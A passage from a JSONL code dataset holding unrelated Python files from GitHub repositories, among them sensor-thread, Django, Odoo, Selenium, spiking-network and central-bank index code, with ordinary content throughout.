time.sleep(.5)\n continue\n \n time.sleep(.5)\n\n except:\n print('Phidget Exception')\n \n\n \"\"\"self.accelerometer0.close()\n self.gyroscope0.close()\n self.magnetometer0.close()\"\"\"\n self.spatial0.close()\n print(\"ended PhidgetThread thread\")\n\n def close(self):\n self.run_thread = False\n self.join()\n\n def set_yaw(self, yaw):\n #print('yaw ', yaw)\n if yaw < 0:\n yaw = 360 + yaw\n yaw += 7\n if yaw > 360:\n yaw = yaw - 360\n with self.msglock:\n self.yaw = yaw\n\n def get_yaw(self):\n with self.msglock: \n yaw = self.yaw\n return yaw\n\n def set_pitch(self, pitch):\n with self.msglock:\n self.pitch = pitch\n\n def get_pitch(self):\n with self.msglock: \n pitch = self.pitch\n return pitch\n\n def set_roll(self, roll):\n with self.msglock:\n self.roll = roll\n\n def get_roll(self):\n with self.msglock: \n roll = self.roll\n return roll\n\n \n def setMagFeild(self, field):\n with self.msglock:\n #print('called setMagFeild')\n #print(\"MagneticField: \\t\"+ str(field[0])+ \" | \"+ str(field[1])+ \" | \"+ str(field[2]))\n self.phidgetMag = PhidgetMag(field[0], field[1], field[2])\n \n def getMagFeild(self):\n with self.msglock:\n field = self.phidgetMag\n \n #print('called getMagFeild')\n #print(\"MagneticField: \\t\"+ str(field.xmag) + \" | \" + str(field.ymag)+ \" | \"+ str(field.zmag))\n return field\n \n \n @classmethod\n def get_instance(cls):\n try:\n if cls._instance == None:\n cls._instance = PhidgetThread()\n cls._run_thread = True\n cls._instance.start()\n cls._instance_count += 1\n return cls._instance\n except:\n cls.put_instance()\n return None\n \n @classmethod\n def put_instance(cls):\n cls._instance_count -= 1\n if cls._instance_count <= 0:\n cls._instance_count = 0\n cls._run_thread = False\n cls._instance = None\n \n \n\nif __name__ == '__main__':\n pdthd = PhidgetThread() \n pdthd.start()\n time.sleep(20)\n pdthd.close()\n\n \"\"\"pdthd = PhidgetThread.get_instance()\n count = 0\n while count < 30:\n yaw = pdthd.get_yaw()\n print('eulor yaw: ', yaw)\n \n field = pdthd.getMagFeild()\n print('magx {0}, magy {1}, magz {2}'.format(field.xmag, field.ymag, field.zmag))\n h = math.atan2(field.xmag, field.ymag)\n h = math.degrees(h)\n if h < 0:\n h = 360 + h\n\n h += 7\n if h > 360:\n h = h - 360\n\n print('heading ', h)\n time.sleep(.05)\n count += 1\n \n pdthd.put_instance()\"\"\"\n\n\n\n ","repo_name":"gibc/pixhawk","sub_path":"PhidgetThread.py","file_name":"PhidgetThread.py","file_ext":"py","file_size_in_byte":8097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29925002195","text":"from django.db import models\nfrom django.db.models.signals import pre_save\nfrom django.utils.text import slugify\n\nclass Division(models.Model):\n name = models.CharField(max_length=100)\n logo = models.ImageField(upload_to=\"division/\",null=True, blank=True)\n logo_white = models.ImageField(upload_to=\"division/\",null=True, blank=True)\n\n slug = models.SlugField(null=False, blank=False, unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.name)\n super(Division,self).save(*args,**kwargs)\n\n def __str__(self):\n return self.name","repo_name":"mascros12/farmanova_csat","sub_path":"app/apps/division/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2511914215","text":"import argparse\nfrom collections import defaultdict\n\ndef get_input(test):\n fname = 'input.list'\n if test:\n fname = 'testdata'\n print('USING TESTING DATA')\n fin = open(fname, 'r')\n elfscals = fin.read().split('\\n\\n')\n retval = {}\n for i,elfcals in enumerate(elfscals):\n retval[i] = [int(c) for c in elfcals.strip().splitlines()]\n fin.close()\n\n return retval\n\n\ndef part2(input):\n elfi_calories = [(e,sum(c)) for e,c in input.items()]\n elfi_calories.sort(key=lambda elfcal: elfcal[1])\n print(sum([ec[1] for ec in elfi_calories[-3:]]))\n\n\ndef part1(input):\n elfi_calories = dict([(e,sum(c)) for e,c in input.items()])\n max_cal = 0\n max_cal_elf = 0\n for k,v in elfi_calories.items():\n if v > max_cal:\n max_cal = v\n max_cal_elf = k\n print(max_cal_elf, max_cal)\n\ndef main():\n parser = argparse.ArgumentParser(description='Advent of code 2020 solutions by Alastair')\n parser.add_argument('-t', '--test', dest='test', action='store_true', default=False, help='Use the file testdata instead of input.list')\n args = parser.parse_args()\n input = get_input(args.test)\n # part1(input)\n part2(input)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dev-dull/advent_of_code","sub_path":"2022/day01/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8402118439","text":"import sys\nimport logging\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import memcache\nfrom google.appengine.ext import db\nfrom dateutil.parser import parse\nfrom dateutil import tz\n\n\nclass Posts(ndb.Model):\n \"\"\"\n Model for storing the Facebook Posts\n \"\"\"\n# id = ndb.StringProperty()\n from_ = ndb.PickleProperty()\n to = ndb.PickleProperty()\n message = ndb.TextProperty()\n message_tags = ndb.PickleProperty()\n picture = ndb.StringProperty()\n link = ndb.StringProperty()\n actions = ndb.PickleProperty()\n type = ndb.StringProperty()\n status_type = ndb.StringProperty()\n created_time = ndb.DateTimeProperty()\n updated_time = ndb.DateTimeProperty()\n shares = ndb.PickleProperty()\n likes = ndb.PickleProperty()\n\n @classmethod\n def save(cls, data):\n \"\"\"\n \n Save an entity in DB.\n \n :param dict data: Item from the 'data' section of the dictionary that was received from\n the Facebook API request /posts/\n :return: Nothing\n \"\"\"\n record = cls.get_or_insert(\n data[\"id\"],\n from_ = data.get(\"from\", {}),\n to = data.get(\"to\", {}),\n message = data.get(\"message\", \"\"),\n message_tags = data.get(\"message_tags\", {}),\n picture = data.get(\"picture\", \"\"),\n link = data.get(\"link\", \"\"),\n actions = data.get(\"actions\", {}),\n type = data.get(\"type\", \"\"),\n status_type = data.get(\"status_type\", \"\"),\n # gae date issue solving:\n # http://hype-free.blogspot.ru/2013/02/converting-datetime-to-utc-in-python.html\n created_time = parse(data[\"created_time\"]).astimezone(tz.tzutc()).replace(tzinfo=None),\n updated_time = parse(data[\"updated_time\"]).astimezone(tz.tzutc()).replace(tzinfo=None),\n shares = data.get(\"shares\", {}),\n likes = data.get(\"likes\", {}),\n )\n return None\n\n @classmethod\n def refresh_db(cls, data):\n \"\"\"\n \n Delete old posts and save new posts.\n\n :param dict data: 'data' section of the dictionary that was received from\n the Facebook API request /posts/\n :returns: Nothing\n \"\"\"\n db_keys = cls.query().fetch(keys_only=True)\n keys = [ndb.Key(cls, item[\"id\"]) for item in data]\n old_keys = [key for key in db_keys if key not in keys]\n logging.info(str(old_keys))\n if old_keys:\n ndb.delete_multi(old_keys)\n for post in data:\n cls.save(post)\n return None\n\n @classmethod\n def get_posts(cls, PageSize):\n \"\"\"\n \n Get the Posts from the DB\n \n :param int page_size: Limit number of the posts returned by this call\n :returns dict: Posts\n \"\"\"\n qr = cls.query().order(cls.key)\n result = qr.map(lambda rec: rec.to_dict(), limit=PageSize)\n return result\n\n\nclass User(db.Model):\n \"\"\"\n Model for storing the User Information\n \"\"\"\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n\n","repo_name":"sdsdsxcxc/facebook-showposts","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10261196272","text":"import logging\nfrom typing import Any, List\n\nfrom minimal_ai.app.utils.string_utils import clean_query\n\nlogger = logging.getLogger(__name__)\n\n\nclass Connection():\n\n def execute(self, query_string: str, commit=False) -> List[tuple]:\n \"\"\"method to execute the query string\"\"\"\n logger.debug(\"Info connecting to database\")\n data: List[tuple] = []\n conn = self.build_connection() # type: ignore\n print(conn)\n with conn.cursor() as cursor:\n cursor.execute(clean_query(query_string))\n if cursor.description:\n data = cursor.fetchall()\n\n if commit:\n conn.commit()\n\n self.close_connection(conn) # type: ignore\n\n return data\n\n def execute_with_cursor(self, query_string: str, curr) -> List[Any]:\n \"\"\"method to execute the query with the cursor\n\n Args:\n qury_string (str): query string to be executed\n curr (_type_): cursor object\n \"\"\"\n logger.debug(\"Info connecting to database\")\n data: List[Any] = []\n\n curr.execute(clean_query(query_string))\n if curr.description:\n data = curr.fetchall()\n\n return data\n","repo_name":"teamclairvoyant/minimal-ai","sub_path":"minimal_ai/app/connections/sql_base.py","file_name":"sql_base.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23315758273","text":"from openerp.osv import fields\nfrom openerp.osv.orm import Model\n\nfrom stock import MARGIN_SCHEME_MODES, MARGIN_SCHEME_MODES_NOT_NEW\n\n\nclass account_voucher(Model):\n _inherit = \"account.voucher\"\n\n def _get_company_default(self, cr, uid, context=None):\n return self.pool.get('res.company')._company_default_get(\n cr, uid, context=context)\n\n _columns = {\n 'is_margin_scheme': fields.boolean('Margin Scheme'),\n 'identity_document_id': fields.many2one('identity.document',\n string='Identity Document', track_visibility='onchange',\n domain=\"[('partner_id', '=', partner_id)]\"),\n }\n\n _defaults = {\n 'is_margin_scheme': False,\n }\n\n def button_refresh_voucher_lines(self, cr, uid, ids, context=None):\n voucher_line_obj = self.pool.get('account.voucher.line')\n\n for voucher in self.browse(cr, uid, ids, context):\n value = self.onchange_partner_id(cr, uid, [voucher.id],\n voucher.partner_id.id, voucher.journal_id.id,\n voucher.amount, voucher.currency_id.id,\n voucher.type, voucher.date, context)['value']\n\n line_ids = [l.id for l in voucher.line_ids]\n if line_ids:\n voucher_line_obj.unlink(cr, uid, line_ids, context)\n\n lines = value.get('line_cr_ids', []) + value.get('line_dr_ids', [])\n for line in lines:\n line['voucher_id'] = voucher.id\n voucher_line_obj.create(cr, uid, line, context)\n\n return {'type': 'ir.actions.act_window_close'}\n\n def proforma_voucher(self, cr, uid, ids, context=None):\n register_obj = self.pool.get('goods.loading.register')\n super(account_voucher, self).proforma_voucher(cr, uid, ids, context)\n register_obj.update_from_receipts(cr, uid, ids, context)\n return True\n\n def on_change_margin_scheme(self, cr, uid, ids, is_margin_scheme, context=None):\n company_id = self._get_company_default(cr, uid, context)\n company = self.pool.get('res.company').browse(cr, uid, company_id, context)\n tax_id = company.margin_account_tax_for_purchase_receipts_id\n value = {\n 'tax_id': tax_id.id if tax_id and is_margin_scheme else None,\n }\n return {'value': value}\n\naccount_voucher()\n\n\nclass account_voucher_line(Model):\n _inherit = 'account.voucher.line'\n\n def _get_lading_register_entry_id(self, cr, uid, ids, name, args,\n context=None):\n res = {}\n entry_obj = self.pool.get('goods.loading.register.line')\n for o in self.browse(cr, uid, ids, context=context):\n entry_ids = entry_obj.search(cr, uid, [\n ('voucher_line_in', '=', o.id),\n ], context=context)\n res[o.id] = entry_ids[0] if len(entry_ids) > 0 else None\n return res\n\n _columns = {\n 'lot_id': fields.many2one('stock.production.lot', string='Lot'),\n 'product_id': fields.related('lot_id', 'product_id', type='many2one',\n relation='product.product', string='Product', readonly=True),\n 'goods_loading_register_entry_id': fields.function(\n _get_lading_register_entry_id, type='many2one',\n obj='goods.loading.register.line',\n string='Goods Loading Register Entry'),\n 'kept_product_id': fields.many2one('kept.product.to.return',\n string='Kept Product To Return', ondelete='restrict'),\n 'is_margin_scheme': fields.related('voucher_id', 'is_margin_scheme',\n type='boolean', string='Margin Scheme', readonly=True),\n }\n\n def on_change_lot_id(self, cr, uid, ids, lot_id, context=None):\n value = {'name': ''}\n if lot_id:\n lot = self.pool.get('stock.production.lot').browse(cr, uid,\n lot_id, context)\n value['name'] = lot.product_id.name_get()[0][1]\n return {'value': value}\n\n def unlink(self, cr, uid, ids, context=None):\n if isinstance(ids, (int, long)):\n ids = [ids]\n k_ids = set()\n for l in self.browse(cr, uid, ids, context):\n if l.kept_product_id:\n k_ids.add(l.kept_product_id.id)\n res = super(account_voucher_line, self).unlink(cr, uid, ids, context)\n self.pool.get('kept.product.to.return').write(cr, uid, list(k_ids), {}, context)\n return res","repo_name":"sergiocorato/margin","sub_path":"techplus_l10n_it_sale/account_voucher.py","file_name":"account_voucher.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22606978339","text":"\"\"\"\nReturn the theoric branch frequency spectrum for a haploid Kingman coalescent\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom compare_theory.bfs_kingman import bfs_kingman\n\nKNOWN_ALPHA_VALUES = [1.1, 1.3, 1.5, 1.9, 2]\nKNOWN_SAMPLE_SIZE_VALUES = [10]\n\nBETA_BFS_VALUES = {\n '1.1': [0.580175, 0.119103, 0.066440, 0.047197, 0.038166, 0.033879, 0.032796, 0.035382, 0.046863],\n '1.3': [0.521296, 0.137166, 0.078487, 0.056070, 0.045115, 0.039481, 0.037258, 0.038479, 0.046649],\n '1.5': [0.467491, 0.152216, 0.090245, 0.065103, 0.052216, 0.045067, 0.041436, 0.040898, 0.045330],\n '1.9': [0.374086, 0.173264, 0.112565, 0.083644, 0.066914, 0.056165, 0.048856, 0.043826, 0.040681]}\n\n\ndef bfs_beta(sample_size, alpha, normalized=False):\n \"\"\" Return the theoric branch frequency (bfs) spectrum for a haploid beta coalescent of parameter alpha\n \n Reminder of the definition of the branch frequency spectrum of a coalescent tree:\n bfs is a table of length sample_size-1 where bfs[i] correspond to the total that have exactly (i+1) descendant in the coalescent tree\n\n - sample_size is the number of individuals sampled\n - if normalized then the bfs is normalized (by default the bfs is not normalized)\n - return the bfs as a numpy array of size sample_size-1\n\n /!\\ When beta is true, not all the values of alpha and of sample_size=len(bfs)+1 are accepted.\n - alpha=2 is always accepted\n - else alpha has to be among these: [1.1, 1.3, 1.5, 1.9, 2]\n and sample_size has to be among these: [10]\n \n Don't forget the the beta coalescent of parameter alpha=2 is a Kingman coalescent.\n \n >>> bfs_beta(sample_size=10, alpha=1.3)\n array([0.521296, 0.137166, 0.078487, 0.05607 , 0.045115, 0.039481,\n 0.037258, 0.038479, 0.046649])\n >>> bfs_beta(sample_size=10, alpha=1.7)\n Traceback (most recent call last):\n ...\n Exception: The theoric values of the branch frequency spectrum of a beta coalescent for alpha=1.7 are not stored.\n Please choose a value of alpha among these : [1.1, 1.3, 1.5, 1.9, 2].\n >>> bfs_beta(sample_size=6, alpha=2, normalized=True)\n array([0.8265843 , 0.41329215, 0.2755281 , 0.20664607, 0.16531686])\n \"\"\"\n abscissa = np.arange(1, sample_size)\n\n if alpha == 2:\n # the beta coalescent for alpha=2 is a Kingman coalescent\n beta_bfs = 1 / abscissa\n elif alpha not in KNOWN_ALPHA_VALUES:\n raise Exception(\n f'The theoric values of the branch frequency spectrum of a beta coalescent for alpha={alpha} are not stored.\\nPlease choose a value of alpha among these : {KNOWN_ALPHA_VALUES}.')\n\n elif sample_size not in KNOWN_SAMPLE_SIZE_VALUES:\n raise Exception(\n f'The theoric values of the branch frequency spectrum of a beta coalescent for a sample size {sample_size} are not stored.\\nPlease choose a value of the sample size among these : {KNOWN_SAMPLE_SIZE_VALUES}.')\n\n else:\n beta_bfs = np.array(BETA_BFS_VALUES[f'{alpha}'])\n\n if normalized:\n beta_bfs = beta_bfs / np.linalg.norm(beta_bfs)\n\n return beta_bfs\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"MarieTemple-Boyer/CoalescentTree","sub_path":"compare_theory/bfs_beta.py","file_name":"bfs_beta.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15008736993","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom time import sleep\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nservice_chrome = Service(r\"C:\\selenium1\\chromedriver.exe\")\n\ndriver = webdriver.Chrome(service=service_chrome)\ndriver.maximize_window()\ndriver.get(\"https://juliemr.github.io/protractor-demo/\")\ndriver.implicitly_wait(10)\n\nnumber_1 = driver.find_element(By.CSS_SELECTOR, \"[ng-model='first']\")\nnumber_2 = driver.find_element(By.CSS_SELECTOR, \"[ng-model='second']\")\naction_math = driver.find_element(By.CSS_SELECTOR, \"[ng-model='operator']\")\ngo_button = driver.find_element(By.ID, \"gobutton\")\n\nnumber_2.send_keys(22)\nnumber_1.send_keys(10)\naction_math_drop_down = Select(action_math)\naction_math_drop_down.select_by_value(\"MULTIPLICATION\")\nsleep(1)\ngo_button.click()\nsleep(1)\n\nresult = driver.find_element(By.CSS_SELECTOR, \"[class='ng-binding']\")\n#while result.text[0]=='.':\n # pass\n#שימוש ב wait לטובת המתנה עד ש...\nwait = WebDriverWait(driver,10)\nwait.until(EC.visibility_of_element_located((By.CSS_SELECTOR,\"td.ng-binding\")))\n\n\n\n\n\nif result.text == '220':\n print('test 1 passed')\nelse:\n print('test 1 faild')\n\n\n","repo_name":"amitlahav1/PycharmProjects","sub_path":"automution_selenium/targil_4.py","file_name":"targil_4.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36547037070","text":"from typing import List, Tuple\n\n\nclass Solution:\n def combinationSum3(self, k: int, n: int) -> List[List[int]]:\n stack: List[int] = []\n result: List[List[int]] = []\n candidates = list(range(1, 10))\n\n def dfs(pos: int, picks_left: int, left: int) -> None:\n if left == 0:\n if picks_left == 0:\n result.append(stack.copy())\n return\n\n if left < 0:\n return\n\n if picks_left == 0:\n return\n\n if pos == len(candidates):\n return\n\n stack.append(candidates[pos])\n dfs(pos + 1, picks_left - 1, left - candidates[pos])\n stack.pop()\n\n dfs(pos + 1, picks_left, left)\n\n dfs(0, k, n)\n\n return result\n\n\nclass Solution1:\n def combinationSum3(self, k: int, n: int) -> List[List[int]]:\n dp = [[False] * (n + 1) for _ in range(k + 1)]\n\n dp[0][0] = True\n\n for step in range(k):\n for num_first in range(n + 1):\n for num_second in range(10):\n if num_first + num_second <= n:\n dp[step + 1][num_first + num_second] = (\n dp[step + 1][num_first + num_second] or dp[step][num_first]\n )\n\n result = []\n\n def dfs(number: int, step: int, path: List[int]) -> None:\n if number < 0:\n return\n\n if step < 0:\n return\n\n if not dp[step][number]:\n return\n\n if number == 0 and step == 0:\n result.append(path.copy())\n\n for next_number in range(path[-1] + 1 if path else 1, min(number + 1, 10)):\n path.append(next_number)\n dfs(number - next_number, step - 1, path)\n path.pop()\n\n dfs(n, k, [])\n\n return result\n\n def combinationSum3TopDown(self, k: int, n: int) -> List[List[int]]:\n def dfs(\n number: int, total: int, steps: int, path: List[int]\n ) -> List[List[int]]:\n if steps > k:\n return []\n\n if total > n:\n return []\n\n if total == n and steps == k:\n return [path.copy()]\n\n if number > 9:\n return []\n\n result = []\n\n path.append(number)\n result += dfs(number + 1, total + number, steps + 1, path)\n path.pop()\n\n result += dfs(number + 1, total, steps, path)\n\n return result\n\n return dfs(1, 0, 0, [])\n","repo_name":"fspv/learning","sub_path":"l33tcode/combination-sum-iii.py","file_name":"combination-sum-iii.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"19"} +{"seq_id":"73823069163","text":"# snntorch\nimport snntorch as snn\nfrom snntorch import surrogate\n\n# torch\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# local\nfrom bnn import *\n\n\nclass Net(nn.Module):\n def __init__(self, config):\n super().__init__()\n\n self.thr1 = config['threshold1']\n self.thr2 = config['threshold2']\n slope = config['slope']\n beta = config['beta']\n self.num_steps = config['num_steps']\n p1 = config['dropout1']\n p2 = config['dropout2']\n self.binarize = config['binarize']\n num_hidden = 3000\n spike_grad = surrogate.fast_sigmoid(slope)\n # Initialize layers with spike operator\n \n \n self.bfc1 = BinaryLinear(700, num_hidden)\n self.fc1 = nn.Linear(700, num_hidden)\n self.lif1 = snn.Leaky(beta, threshold=self.thr1, spike_grad=spike_grad)\n self.dropout1 = nn.Dropout(p1)\n \n self.bfc2 = BinaryLinear(num_hidden, 20)\n self.fc2 = nn.Linear(num_hidden, 20)\n self.lif2 = snn.Leaky(beta, threshold=self.thr2, spike_grad=spike_grad)\n self.dropout2 = nn.Dropout(p2)\n\n\n def forward(self, x):\n\n # Initialize hidden states and outputs at t=0\n mem1 = self.lif1.init_leaky() \n mem2 = self.lif2.init_leaky()\n \n # Record the final layer\n spk2_rec = []\n mem2_rec = []\n\n # Binarization\n\n if self.binarize:\n\n for step in range(x.size(0)):\n \n cur1 = self.dropout1(self.bfc1(x[step].flatten(1)))\n spk1, mem1 = self.lif1(cur1, mem1)\n cur2 = self.dropout2(self.bfc2(spk1))\n spk2, mem2 = self.lif2(cur2, mem2)\n\n\n spk2_rec.append(spk2)\n mem2_rec.append(mem2)\n\n return torch.stack(spk2_rec, dim=0), torch.stack(mem2_rec, dim=0)\n \n # Full Precision\n \n else:\n\n for step in range(x.size(0)):\n \n cur1 = self.dropout1(self.fc1(x[step].flatten(1)))\n spk1, mem1 = self.lif1(cur1, mem1)\n cur2 = self.dropout2(self.fc2(spk1))\n spk2, mem2 = self.lif2(cur2, mem2)\n spk2_rec.append(spk2)\n mem2_rec.append(mem2)\n\n return torch.stack(spk2_rec, dim=0), torch.stack(mem2_rec, dim=0)\n\n ","repo_name":"jeshraghian/snn-tha","sub_path":"shd/Net.py","file_name":"Net.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"11683436929","text":"from libcontractvm import Wallet, WalletExplorer, ConsensusManager\nfrom forum import ForumManager\nimport sys\nimport time\nimport os\n\nconsMan = ConsensusManager.ConsensusManager ()\nconsMan.bootstrap (\"http://127.0.0.1:8181\")\n\nwallet = WalletExplorer.WalletExplorer (wallet_file='test.wallet')\nsrMan = ForumManager.ForumManager (consMan, wallet=wallet)\n\nos.system ('clear')\npostid = input('Insert the ID of the post: ')\ntry:\n\tpost = srMan.getPostInfo(postid)\n\tprint ('Title of the post:\\t',post['title'])\n\tprint ('Message of the post:\\t',post['message'])\n\ti=0\t\n\tcomments = post['comments']\n\tif(len(comments)>0):\n\t\tprint(\"Comments:\")\n\t\tfor c in comments.values():\n\t\t\tprint (\"%d)\"% i, c)\n\t\t\ti=i+1\nexcept:\n\tprint('Error')\n\t\n\n","repo_name":"andreasscalas/dappforum","sub_path":"samples/post_info.py","file_name":"post_info.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72605823084","text":"import pandas\n\nfrom .. import MarketIndex\n\nclass BCBMarketIndex(MarketIndex):\n # Tabela (dita obsoleta) com o código dos índices:\n # https://www.bcb.gov.br/estatisticas/indecoreestruturacao\n\n series={\n 'CDI': dict(\n url=\"https://api.bcb.gov.br/dados/serie/bcdata.sgs.12/dados?formato=json\",\n home=''\n ),\n 'IPCA': dict(\n # IPCA Serviços. Outros IPCAs: https://dadosabertos.bcb.gov.br/dataset?q=ipca\n url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.433/dados?formato=json\",\n home = 'https://dadosabertos.bcb.gov.br/dataset/10844-indice-de-precos-ao-consumidor-amplo-ipca---servicos'\n ),\n 'SELIC': dict(\n url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.11/dados?formato=json\",\n home = 'https://dadosabertos.bcb.gov.br/dataset/11-taxa-de-juros---selic'\n ),\n 'IGPM': dict(\n # url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.4175/dados?formato=json\",\n url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.189/dados?formato=json\",\n home = 'https://dadosabertos.bcb.gov.br/dataset/4175-divida-mobiliaria---participacao-por-indexador---posicao-em-carteira---igp-m'\n ),\n 'INPC': dict(\n url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.188/dados?formato=json\",\n home = ''\n ),\n }\n\n\n\n def __init__(self, name, isRate=True, cache=None, refresh=False):\n if name in self.series:\n s=self.series[name]\n else:\n raise Exception(f'BCBMarketIndex: market index not found: {name}')\n\n super().__init__(kind='BCBMarketIndex', id=name, currency='BRL', isRate=isRate, cache=cache, refresh=refresh)\n\n\n\n @property\n def home(self):\n return self.series[self.id]['home']\n\n\n\n def refreshData(self):\n try:\n self.data=pandas.read_json(self.series[self.id]['url'])\n except BaseException as err:\n self.logger.warning(f\"URL was: {self.series[self.id]['url']}\")\n raise\n\n\n\n def processData(self):\n self.data=(\n self.data\n\n # Create columns\n .assign(\n time=lambda table: (\n (\n # Convert to datetime\n pandas.to_datetime(table.data,dayfirst=True) +\n\n # This is date-only information but we know this is the\n # end of the day\n pandas.Timedelta(hours=22, minutes=59)\n )\n # Set timezone to Brasilia\n .dt\n .tz_localize('Brazil/East')\n\n # Keep it as UTC as module´s internal standard and to\n # improve precision of joins.\n .dt\n .tz_convert('UTC')\n ),\n\n # Convert rate to our standards\n rate=lambda table: table.valor/100,\n\n # Init a column for value\n value=None\n )\n\n # Remove unused\n .drop(columns=['data', 'valor'])\n\n # Time as index\n .set_index('time')\n .sort_index()\n\n # Export only these columns (and time in the index)\n [['rate','value']]\n )\n\n # Now compute value like this:\n #\n # { n=0: 1 + rateₙ\n # valueₙ = {\n # { n≠0: valueₙ₋₁ ✕ (1 + rateₙ)\n #\n\n # At this point we have a dataframe indexed by time with 2 columns:\n # - rate (index 0)\n # - value (index 1, with no data yet)\n\n for n in range(self.data.shape[0]):\n self.data.iat[n,1] = (\n 1+self.data.iat[n,0]\n if n==0\n else self.data.iat[n-1,1]*(1+self.data.iat[n,0])\n )\n","repo_name":"avibrazil/investorzilla","sub_path":"investorzilla/marketindex/brasil_banco_central.py","file_name":"brasil_banco_central.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"29025829269","text":"def pesquisar(nome) :\n if(nome in listaNome) :\n posicao = listaNome.index(nome)\n print(\"------------------------------\")\n print(\"Nome: \", listaNome[posicao], listaSobrenome[posicao])\n print(\"Teefone: \",listaFone[posicao])\n print(\"-------------------------\")\n else:\n print(\"-------------------------\")\n print(\"Pessoa não encontrada\")\n print(\"-------------------------\")\n\ndef excluir(nome):\n if(nome in listaNome) :\n posicao = listaNome.index(nome)\n listaNome.pop(posicao)\n listaSobrenome.pop(posicao)\n listaFone.pop(posicao)\n print(\"Exluido com sucesso!\")\n else:\n print(\"-----------------------\")\n print(\"Pessoa não encontrada\")\n print(\"-----------------------\")\n\ndef listar():\n for item in range(0, len(listaNome)):\n print(\"-----------------------\")\n print( \"Nome: \", listaNome[item, listaSobrenome[item]])\n print(\"-----------------------\")\n\nlistaNome = []\nlistaSobrenome = []\nlistaFone = []\nwhile True:\n print(\" 1 - Cadastrar\")\n print(\" 2 - Pesquisar\")\n print(\" 3 - Excluir\")\n print(\" 4 - Listar todos\")\n op = int(input(\"Digide a opção desejada: \"))\n if(op == 1):\n nome = input(\"Informe o Nome: \")\n sobrenome = input(\"Informe o Sobrenome: \")\n fone = input(\"Informe o Telefone: \")\n listaNome.append(nome)\n listaSobrenome.append(sobrenome)\n listaFone.append(fone)\n print(\"-----------------------\")\n print(\"Cadastrado com Sucesso!\")\n print(\"-----------------------\")\n else:\n if(op == 2):\n pesquisa = input(\"Informe o nome a pesquisar: \")\n pesquisar(pesquisa)\n else:\n if(op == 3):\n pesquisa = input(\"Informe o nome a excluir: \")\n excluir(pesquisa)\n else:\n if(op == 4):\n listar()","repo_name":"englernicolas/ADS","sub_path":"python/aula3-extra.py","file_name":"aula3-extra.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38271378099","text":"import unittest\n\nfrom datastructure.bst import BinarySearchTree\n\n\nclass TestBinarySearchTree(unittest.TestCase):\n\n def test_insert(self):\n arr = [10, 1002, 345, 11, 7545, 44, 12612, 232]\n bst = BinarySearchTree()\n for i in arr:\n bst.insert(i)\n\n print(bst.dfs('inorder'))\n\n def test_dfs(self):\n bst = BinarySearchTree()\n for i in [8, 3, 10, 1, 6, 14, 4, 7, 13]:\n bst.insert(i)\n\n print(bst.dfs('inorder'))\n print(bst.dfs('preorder')) # 전위순회하여 결과를 반환\n print(bst.dfs('postorder')) # 후위순회하여 결과를 반환\n print(bst.find(6))\n print(bst.find(15))\n bst.bfs()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"codingbjs/AlgorythmExam","sub_path":"datastructure/tests/TestBst.py","file_name":"TestBst.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29592569231","text":"# Run with:\n# python -m pytest\n\nimport datetime\nimport pytest\nimport requests\n\nfrom mercado_bitcoin.apis import ApiMercadoBitcoin, ApiDaySummary, ApiTrades\nfrom unittest.mock import 